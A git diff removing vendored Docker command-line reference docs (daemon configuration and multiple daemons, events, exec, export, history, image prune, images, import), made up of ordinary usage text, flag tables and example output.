-- `max-concurrent-uploads`: it updates the max concurrent uploads for each push. -- `default-runtime`: it updates the runtime to be used if it is not - specified at container creation. It defaults to "default" which is - the runtime shipped with the official docker packages. -- `runtimes`: it updates the list of available OCI runtimes that can - be used to run containers -- `authorization-plugin`: specifies the authorization plugins to use. -- `insecure-registries`: it replaces the daemon insecure registries with a new set of insecure registries. If some existing insecure registries in daemon's configuration are not in newly reloaded insecure registries, these existing ones will be removed from daemon's config. - -Updating and reloading the cluster configurations such as `--cluster-store`, -`--cluster-advertise` and `--cluster-store-opts` will take effect only if -these configurations were not previously configured. If `--cluster-store` -has been provided in flags and `cluster-advertise` not, `cluster-advertise` -can be added in the configuration file without being accompanied by `--cluster-store`. -Configuration reload will log a warning message if it detects a change in -previously configured cluster configurations. - - -## Running multiple daemons - -> **Note:** Running multiple daemons on a single host is considered "experimental". The user should be aware of -> unsolved problems. This solution may not work properly in some cases. Solutions are currently under development -> and will be delivered in the near future. - -This section describes how to run multiple Docker daemons on a single host. To -run multiple daemons, you must configure each daemon so that it does not -conflict with other daemons on the same host. You can set these options either -by providing them as flags, or by using a [daemon configuration file](#daemon-configuration-file). 
- -The following daemon options must be configured for each daemon: - -```bash --b, --bridge= Attach containers to a network bridge ---exec-root=/var/run/docker Root of the Docker execdriver --g, --graph=/var/lib/docker Root of the Docker runtime --p, --pidfile=/var/run/docker.pid Path to use for daemon PID file --H, --host=[] Daemon socket(s) to connect to ---iptables=true Enable addition of iptables rules ---config-file=/etc/docker/daemon.json Daemon configuration file ---tlscacert="~/.docker/ca.pem" Trust certs signed only by this CA ---tlscert="~/.docker/cert.pem" Path to TLS certificate file ---tlskey="~/.docker/key.pem" Path to TLS key file -``` - -When your daemons use different values for these flags, you can run them on the same host without any problems. -It is very important to properly understand the meaning of those options and to use them correctly. - -- The `-b, --bridge=` flag is set to `docker0` as default bridge network. It is created automatically when you install Docker. -If you are not using the default, you must create and configure the bridge manually or just set it to 'none': `--bridge=none` -- `--exec-root` is the path where the container state is stored. The default value is `/var/run/docker`. Specify the path for -your running daemon here. -- `--graph` is the path where images are stored. The default value is `/var/lib/docker`. To avoid any conflict with other daemons -set this parameter separately for each daemon. -- `-p, --pidfile=/var/run/docker.pid` is the path where the process ID of the daemon is stored. Specify the path for your -pid file here. -- `--host=[]` specifies where the Docker daemon will listen for client connections. If unspecified, it defaults to `/var/run/docker.sock`. -- `--iptables=false` prevents the Docker daemon from adding iptables rules. If -multiple daemons manage iptables rules, they may overwrite rules set by another -daemon. 
Be aware that disabling this option requires you to manually add -iptables rules to expose container ports. If you prevent Docker from adding -iptables rules, Docker will also not add IP masquerading rules, even if you set -`--ip-masq` to `true`. Without IP masquerading rules, Docker containers will not be -able to connect to external hosts or the internet when using network other than -default bridge. -- `--config-file=/etc/docker/daemon.json` is the path where configuration file is stored. You can use it instead of -daemon flags. Specify the path for each daemon. -- `--tls*` Docker daemon supports `--tlsverify` mode that enforces encrypted and authenticated remote connections. -The `--tls*` options enable use of specific certificates for individual daemons. - -Example script for a separate “bootstrap” instance of the Docker daemon without network: - -```bash -$ sudo dockerd \ - -H unix:///var/run/docker-bootstrap.sock \ - -p /var/run/docker-bootstrap.pid \ - --iptables=false \ - --ip-masq=false \ - --bridge=none \ - --graph=/var/lib/docker-bootstrap \ - --exec-root=/var/run/docker-bootstrap -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/events.md b/vendor/github.com/docker/docker/docs/reference/commandline/events.md deleted file mode 100644 index baa966d620..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/events.md +++ /dev/null @@ -1,217 +0,0 @@ ---- -title: "events" -description: "The events command description and usage" -keywords: "events, container, report" ---- - - - -# events - -```markdown -Usage: docker events [OPTIONS] - -Get real time events from the server - -Options: - -f, --filter value Filter output based on conditions provided (default []) - --format string Format the output using the given Go template - --help Print usage - --since string Show all events created since timestamp - --until string Stream events until this timestamp -``` - -Docker containers report the following events: - - 
attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, health_status, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update - -Docker images report the following events: - - delete, import, load, pull, push, save, tag, untag - -Docker plugins report the following events: - - install, enable, disable, remove - -Docker volumes report the following events: - - create, mount, unmount, destroy - -Docker networks report the following events: - - create, connect, disconnect, destroy - -The Docker daemon reports the following events: - - reload - -The `--since` and `--until` parameters can be Unix timestamps, date formatted -timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed -relative to the client machine’s time. If you do not provide the `--since` option, -the command returns only new and/or live events. Supported formats for date -formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`, -`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local -timezone on the client will be used if you do not provide either a `Z` or a -`+-00:00` timezone offset at the end of the timestamp. When providing Unix -timestamps enter seconds[.nanoseconds], where seconds is the number of seconds -that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap -seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a -fraction of a second no more than nine digits long. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". 
If you would -like to use multiple filters, pass multiple flags (e.g., -`--filter "foo=bar" --filter "bif=baz"`) - -Using the same filter multiple times will be handled as an *OR*; for example -`--filter container=588a23dac085 --filter container=a8f7720b8c22` will display -events for container 588a23dac085 *OR* container a8f7720b8c22 - -Using multiple filters will be handled as an *AND*; for example -`--filter container=588a23dac085 --filter event=start` will display events for -container 588a23dac085 *AND* the event type is *start* - -The currently supported filters are: - -* container (`container=`) -* event (`event=`) -* image (`image=`) -* plugin (experimental) (`plugin=`) -* label (`label=` or `label==`) -* type (`type=`) -* volume (`volume=`) -* network (`network=`) -* daemon (`daemon=`) - -## Format - -If a format (`--format`) is specified, the given template will be executed -instead of the default -format. Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -If a format is set to `{{json .}}`, the events are streamed as valid JSON -Lines. For information about JSON Lines, please refer to http://jsonlines.org/ . - -## Examples - -You'll need two shells for this example. - -**Shell 1: Listening for events:** - - $ docker events - -**Shell 2: Start and Stop containers:** - - $ docker start 4386fb97867d - $ docker stop 4386fb97867d - $ docker stop 7805c1d35632 - -**Shell 1: (Again .. 
now showing events):** - - 2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - -**Show events in the past from a specified time:** - - $ docker events --since 1378216169 - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --since '2013-09-03' - 2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --since '2013-09-03T15:49:29' - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - -This example outputs all events that were generated in the last 3 minutes, -relative to the current time on the client machine: - - $ docker events --since '3m' - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d 
(image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - -**Filter events:** - - $ docker events --filter 'event=stop' - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'image=ubuntu-1:14.04' - 2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - - $ docker events --filter 'container=7805c1d35632' - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8) - - $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' - 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'container=7805c1d35632' --filter 'event=stop' - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'container=container_1' --filter 'container=container_2' - 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (imager=redis:2.8) - 
2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'type=volume' - 2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local) - 2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate) - 2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local) - 2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local) - - $ docker events --filter 'type=network' - 2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge) - 2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge) - - $ docker events --filter 'type=plugin' (experimental) - 2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) - 2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) - -**Format:** - - $ docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' - Type=container Status=create ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=attach ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=start ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=resize ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - 
Type=container Status=die ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=destroy ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - -**Format (as JSON Lines):** - - $ docker events --format '{{json .}}' - {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e.. - {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42.. - {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md deleted file mode 100644 index 38891c9ea0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md +++ /dev/null @@ -1,65 +0,0 @@ ---- -title: "exec" -description: "The exec command description and usage" -keywords: "command, container, run, execute" ---- - - - -# exec - -```markdown -Usage: docker exec [OPTIONS] CONTAINER COMMAND [ARG...] - -Run a command in a running container - -Options: - -d, --detach Detached mode: run command in the background - --detach-keys Override the key sequence for detaching a container - -e, --env=[] Set environment variables - --help Print usage - -i, --interactive Keep STDIN open even if not attached - --privileged Give extended privileges to the command - -t, --tty Allocate a pseudo-TTY - -u, --user Username or UID (format: [:]) -``` - -The `docker exec` command runs a new command in a running container. - -The command started using `docker exec` only runs while the container's primary -process (`PID 1`) is running, and it is not restarted if the container is -restarted. 
- -If the container is paused, then the `docker exec` command will fail with an error: - - $ docker pause test - test - $ docker ps - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - 1ae3b36715d2 ubuntu:latest "bash" 17 seconds ago Up 16 seconds (Paused) test - $ docker exec test ls - FATA[0000] Error response from daemon: Container test is paused, unpause the container before exec - $ echo $? - 1 - -## Examples - - $ docker run --name ubuntu_bash --rm -i -t ubuntu bash - -This will create a container named `ubuntu_bash` and start a Bash session. - - $ docker exec -d ubuntu_bash touch /tmp/execWorks - -This will create a new file `/tmp/execWorks` inside the running container -`ubuntu_bash`, in the background. - - $ docker exec -it ubuntu_bash bash - -This will create a new Bash session in the container `ubuntu_bash`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/export.md b/vendor/github.com/docker/docker/docs/reference/commandline/export.md deleted file mode 100644 index 1004fc30c0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/export.md +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: "export" -description: "The export command description and usage" -keywords: "export, file, system, container" ---- - - - -# export - -```markdown -Usage: docker export [OPTIONS] CONTAINER - -Export a container's filesystem as a tar archive - -Options: - --help Print usage - -o, --output string Write to a file, instead of STDOUT -``` - -The `docker export` command does not export the contents of volumes associated -with the container. If a volume is mounted on top of an existing directory in -the container, `docker export` will export the contents of the *underlying* -directory, not the contents of the volume. - -Refer to [Backup, restore, or migrate data -volumes](https://docs.docker.com/engine/tutorials/dockervolumes/#backup-restore-or-migrate-data-volumes) in -the user guide for examples on exporting data in a volume. 
- -## Examples - - $ docker export red_panda > latest.tar - -Or - - $ docker export --output="latest.tar" red_panda diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/history.md b/vendor/github.com/docker/docker/docs/reference/commandline/history.md deleted file mode 100644 index 00f88db35b..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/history.md +++ /dev/null @@ -1,48 +0,0 @@ ---- -title: "history" -description: "The history command description and usage" -keywords: "docker, image, history" ---- - - - -# history - -```markdown -Usage: docker history [OPTIONS] IMAGE - -Show the history of an image - -Options: - --help Print usage - -H, --human Print sizes and dates in human readable format (default true) - --no-trunc Don't truncate output - -q, --quiet Only show numeric IDs -``` - -To see how the `docker:latest` image was built: - - $ docker history docker - IMAGE CREATED CREATED BY SIZE COMMENT - 3e23a5875458 8 days ago /bin/sh -c #(nop) ENV LC_ALL=C.UTF-8 0 B - 8578938dd170 8 days ago /bin/sh -c dpkg-reconfigure locales && loc 1.245 MB - be51b77efb42 8 days ago /bin/sh -c apt-get update && apt-get install 338.3 MB - 4b137612be55 6 weeks ago /bin/sh -c #(nop) ADD jessie.tar.xz in / 121 MB - 750d58736b4b 6 weeks ago /bin/sh -c #(nop) MAINTAINER Tianon Gravi - -# image prune - -```markdown -Usage: docker image prune [OPTIONS] - -Remove unused images - -Options: - -a, --all Remove all unused images, not just dangling ones - -f, --force Do not prompt for confirmation - --help Print usage -``` - -Remove all dangling images. If `-a` is specified, will also remove all images not referenced by any container. - -Example output: - -```bash -$ docker image prune -a -WARNING! This will remove all images without at least one container associated to them. -Are you sure you want to continue? 
[y/N] y -Deleted Images: -untagged: alpine:latest -untagged: alpine@sha256:3dcdb92d7432d56604d4545cbd324b14e647b313626d99b889d0626de158f73a -deleted: sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba -deleted: sha256:4fe15f8d0ae69e169824f25f1d4da3015a48feeeeebb265cd2e328e15c6a869f -untagged: alpine:3.3 -untagged: alpine@sha256:4fa633f4feff6a8f02acfc7424efd5cb3e76686ed3218abf4ca0fa4a2a358423 -untagged: my-jq:latest -deleted: sha256:ae67841be6d008a374eff7c2a974cde3934ffe9536a7dc7ce589585eddd83aff -deleted: sha256:34f6f1261650bc341eb122313372adc4512b4fceddc2a7ecbb84f0958ce5ad65 -deleted: sha256:cf4194e8d8db1cb2d117df33f2c75c0369c3a26d96725efb978cc69e046b87e7 -untagged: my-curl:latest -deleted: sha256:b2789dd875bf427de7f9f6ae001940073b3201409b14aba7e5db71f408b8569e -deleted: sha256:96daac0cb203226438989926fc34dd024f365a9a8616b93e168d303cfe4cb5e9 -deleted: sha256:5cbd97a14241c9cd83250d6b6fc0649833c4a3e84099b968dd4ba403e609945e -deleted: sha256:a0971c4015c1e898c60bf95781c6730a05b5d8a2ae6827f53837e6c9d38efdec -deleted: sha256:d8359ca3b681cc5396a4e790088441673ed3ce90ebc04de388bfcd31a0716b06 -deleted: sha256:83fc9ba8fb70e1da31dfcc3c88d093831dbd4be38b34af998df37e8ac538260c -deleted: sha256:ae7041a4cc625a9c8e6955452f7afe602b401f662671cea3613f08f3d9343b35 -deleted: sha256:35e0f43a37755b832f0bbea91a2360b025ee351d7309dae0d9737bc96b6d0809 -deleted: sha256:0af941dd29f00e4510195dd00b19671bc591e29d1495630e7e0f7c44c1e6a8c0 -deleted: sha256:9fc896fc2013da84f84e45b3096053eb084417b42e6b35ea0cce5a3529705eac -deleted: sha256:47cf20d8c26c46fff71be614d9f54997edacfe8d46d51769706e5aba94b16f2b -deleted: sha256:2c675ee9ed53425e31a13e3390bf3f539bf8637000e4bcfbb85ee03ef4d910a1 - -Total reclaimed space: 16.43 MB -``` - -## Related information - -* [system df](system_df.md) -* [container prune](container_prune.md) -* [volume prune](volume_prune.md) -* [network prune](network_prune.md) -* [system prune](system_prune.md) diff --git 
a/vendor/github.com/docker/docker/docs/reference/commandline/images.md b/vendor/github.com/docker/docker/docs/reference/commandline/images.md deleted file mode 100644 index 3b9ea1fe17..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/images.md +++ /dev/null @@ -1,304 +0,0 @@ ---- -title: "images" -description: "The images command description and usage" -keywords: "list, docker, images" ---- - - - -# images - -```markdown -Usage: docker images [OPTIONS] [REPOSITORY[:TAG]] - -List images - -Options: - -a, --all Show all images (default hides intermediate images) - --digests Show digests - -f, --filter value Filter output based on conditions provided (default []) - - dangling=(true|false) - - label= or label== - - before=([:tag]||) - - since=([:tag]||) - - reference=(pattern of an image reference) - --format string Pretty-print images using a Go template - --help Print usage - --no-trunc Don't truncate output - -q, --quiet Only show numeric IDs -``` - -The default `docker images` will show all top level -images, their repository and tags, and their size. - -Docker images have intermediate layers that increase reusability, -decrease disk usage, and speed up `docker build` by -allowing each step to be cached. These intermediate layers are not shown -by default. - -The `SIZE` is the cumulative space taken up by the image and all -its parent images. This is also the disk space used by the contents of the -Tar file created when you `docker save` an image. - -An image will be listed more than once if it has multiple repository names -or tags. This single image (identifiable by its matching `IMAGE ID`) -uses up the `SIZE` listed only once. 
- -### Listing the most recently created images - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - 77af4d6b9913 19 hours ago 1.089 GB - committ latest b6fa739cedf5 19 hours ago 1.089 GB - 78a85c484f71 19 hours ago 1.089 GB - docker latest 30557a29d5ab 20 hours ago 1.089 GB - 5ed6274db6ce 24 hours ago 1.089 GB - postgres 9 746b819f315e 4 days ago 213.4 MB - postgres 9.3 746b819f315e 4 days ago 213.4 MB - postgres 9.3.5 746b819f315e 4 days ago 213.4 MB - postgres latest 746b819f315e 4 days ago 213.4 MB - -### Listing images by name and tag - -The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument -that restricts the list to images that match the argument. If you specify -`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the -given repository. - -For example, to list all images in the "java" repository, run this command : - - $ docker images java - REPOSITORY TAG IMAGE ID CREATED SIZE - java 8 308e519aac60 6 days ago 824.5 MB - java 7 493d82594c15 3 months ago 656.3 MB - java latest 2711b1d6f3aa 5 months ago 603.9 MB - -The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example, -`docker images jav` does not match the image `java`. - -If both `REPOSITORY` and `TAG` are provided, only images matching that -repository and tag are listed. To find all local images in the "java" -repository with tag "8" you can use: - - $ docker images java:8 - REPOSITORY TAG IMAGE ID CREATED SIZE - java 8 308e519aac60 6 days ago 824.5 MB - -If nothing matches `REPOSITORY[:TAG]`, the list is empty. 
- - $ docker images java:0 - REPOSITORY TAG IMAGE ID CREATED SIZE - -## Listing the full length image IDs - - $ docker images --no-trunc - REPOSITORY TAG IMAGE ID CREATED SIZE - sha256:77af4d6b9913e693e8d0b4b294fa62ade6054e6b2f1ffb617ac955dd63fb0182 19 hours ago 1.089 GB - committest latest sha256:b6fa739cedf5ea12a620a439402b6004d057da800f91c7524b5086a5e4749c9f 19 hours ago 1.089 GB - sha256:78a85c484f71509adeaace20e72e941f6bdd2b25b4c75da8693efd9f61a37921 19 hours ago 1.089 GB - docker latest sha256:30557a29d5abc51e5f1d5b472e79b7e296f595abcf19fe6b9199dbbc809c6ff4 20 hours ago 1.089 GB - sha256:0124422dd9f9cf7ef15c0617cda3931ee68346455441d66ab8bdc5b05e9fdce5 20 hours ago 1.089 GB - sha256:18ad6fad340262ac2a636efd98a6d1f0ea775ae3d45240d3418466495a19a81b 22 hours ago 1.082 GB - sha256:f9f1e26352f0a3ba6a0ff68167559f64f3e21ff7ada60366e2d44a04befd1d3a 23 hours ago 1.089 GB - tryout latest sha256:2629d1fa0b81b222fca63371ca16cbf6a0772d07759ff80e8d1369b926940074 23 hours ago 131.5 MB - sha256:5ed6274db6ceb2397844896966ea239290555e74ef307030ebb01ff91b1914df 24 hours ago 1.089 GB - -## Listing image digests - -Images that use the v2 or later format have a content-addressable identifier -called a `digest`. As long as the input used to generate the image is -unchanged, the digest value is predictable. To list image digest values, use -the `--digests` flag: - - $ docker images --digests - REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE - localhost:5000/test/busybox sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf 4986bf8c1536 9 weeks ago 2.43 MB - -When pushing or pulling to a 2.0 registry, the `push` or `pull` command -output includes the image digest. You can `pull` using a digest value. You can -also reference by digest in `create`, `run`, and `rmi` commands, as well as the -`FROM` image reference in a Dockerfile. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". 
If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* dangling (boolean - true or false) -* label (`label=` or `label==`) -* before (`[:]`, `` or ``) - filter images created before given id or references -* since (`[:]`, `` or ``) - filter images created since given id or references - -##### Untagged images (dangling) - - $ docker images --filter "dangling=true" - - REPOSITORY TAG IMAGE ID CREATED SIZE - 8abc22fbb042 4 weeks ago 0 B - 48e5f45168b9 4 weeks ago 2.489 MB - bf747efa0e2f 4 weeks ago 0 B - 980fe10e5736 12 weeks ago 101.4 MB - dea752e4e117 12 weeks ago 101.4 MB - 511136ea3c5a 8 months ago 0 B - -This will display untagged images, that are the leaves of the images tree (not -intermediary layers). These images occur when a new build of an image takes the -`repo:tag` away from the image ID, leaving it as `:` or untagged. -A warning will be issued if trying to remove an image when a container is presently -using it. By having this flag it allows for batch cleanup. - -Ready for use by `docker rmi ...`, like: - - $ docker rmi $(docker images -f "dangling=true" -q) - - 8abc22fbb042 - 48e5f45168b9 - bf747efa0e2f - 980fe10e5736 - dea752e4e117 - 511136ea3c5a - -NOTE: Docker will warn you if any containers exist that are using these untagged images. - - -##### Labeled images - -The `label` filter matches images based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches images with the `com.example.version` label regardless of its value. - - $ docker images --filter "label=com.example.version" - - REPOSITORY TAG IMAGE ID CREATED SIZE - match-me-1 latest eeae25ada2aa About a minute ago 188.3 MB - match-me-2 latest dea752e4e117 About a minute ago 188.3 MB - -The following filter matches images with the `com.example.version` label with the `1.0` value. 
- - $ docker images --filter "label=com.example.version=1.0" - REPOSITORY TAG IMAGE ID CREATED SIZE - match-me latest 511136ea3c5a About a minute ago 188.3 MB - -In this example, with the `0.1` value, it returns an empty set because no matches were found. - - $ docker images --filter "label=com.example.version=0.1" - REPOSITORY TAG IMAGE ID CREATED SIZE - -#### Before - -The `before` filter shows only images created before the image with -given id or reference. For example, having these images: - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - image1 latest eeae25ada2aa 4 minutes ago 188.3 MB - image2 latest dea752e4e117 9 minutes ago 188.3 MB - image3 latest 511136ea3c5a 25 minutes ago 188.3 MB - -Filtering with `before` would give: - - $ docker images --filter "before=image1" - REPOSITORY TAG IMAGE ID CREATED SIZE - image2 latest dea752e4e117 9 minutes ago 188.3 MB - image3 latest 511136ea3c5a 25 minutes ago 188.3 MB - -#### Since - -The `since` filter shows only images created after the image with -given id or reference. For example, having these images: - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - image1 latest eeae25ada2aa 4 minutes ago 188.3 MB - image2 latest dea752e4e117 9 minutes ago 188.3 MB - image3 latest 511136ea3c5a 25 minutes ago 188.3 MB - -Filtering with `since` would give: - - $ docker images --filter "since=image3" - REPOSITORY TAG IMAGE ID CREATED SIZE - image1 latest eeae25ada2aa 4 minutes ago 188.3 MB - image2 latest dea752e4e117 9 minutes ago 188.3 MB - -#### Reference - -The `reference` filter shows only images whose reference matches -the specified pattern. 
- - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest e02e811dd08f 5 weeks ago 1.09 MB - busybox uclibc e02e811dd08f 5 weeks ago 1.09 MB - busybox musl 733eb3059dce 5 weeks ago 1.21 MB - busybox glibc 21c16b6787c6 5 weeks ago 4.19 MB - -Filtering with `reference` would give: - - $ docker images --filter=reference='busy*:*libc' - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox uclibc e02e811dd08f 5 weeks ago 1.09 MB - busybox glibc 21c16b6787c6 5 weeks ago 4.19 MB - -## Formatting - -The formatting option (`--format`) will pretty print container output -using a Go template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ----- | ---- -`.ID` | Image ID -`.Repository` | Image repository -`.Tag` | Image tag -`.Digest` | Image digest -`.CreatedSince` | Elapsed time since the image was created -`.CreatedAt` | Time when the image was created -`.Size` | Image disk size - -When using the `--format` option, the `image` command will either -output the data exactly as the template declares or, when using the -`table` directive, will include column headers as well. 
- -The following example uses a template without headers and outputs the -`ID` and `Repository` entries separated by a colon for all images: - - {% raw %} - $ docker images --format "{{.ID}}: {{.Repository}}" - 77af4d6b9913: - b6fa739cedf5: committ - 78a85c484f71: - 30557a29d5ab: docker - 5ed6274db6ce: - 746b819f315e: postgres - 746b819f315e: postgres - 746b819f315e: postgres - 746b819f315e: postgres - {% endraw %} - -To list all images with their repository and tag in a table format you -can use: - - {% raw %} - $ docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}" - IMAGE ID REPOSITORY TAG - 77af4d6b9913 - b6fa739cedf5 committ latest - 78a85c484f71 - 30557a29d5ab docker latest - 5ed6274db6ce - 746b819f315e postgres 9 - 746b819f315e postgres 9.3 - 746b819f315e postgres 9.3.5 - 746b819f315e postgres latest - {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/import.md b/vendor/github.com/docker/docker/docs/reference/commandline/import.md deleted file mode 100644 index 20e90a61fd..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/import.md +++ /dev/null @@ -1,75 +0,0 @@ ---- -title: "import" -description: "The import command description and usage" -keywords: "import, file, system, container" ---- - - - -# import - -```markdown -Usage: docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]] - -Import the contents from a tarball to create a filesystem image - -Options: - -c, --change value Apply Dockerfile instruction to the created image (default []) - --help Print usage - -m, --message string Set commit message for imported image -``` - -You can specify a `URL` or `-` (dash) to take data directly from `STDIN`. The -`URL` can point to an archive (.tar, .tar.gz, .tgz, .bzip, .tar.xz, or .txz) -containing a filesystem or to an individual file on the Docker host. If you -specify an archive, Docker untars it in the container relative to the `/` -(root). 
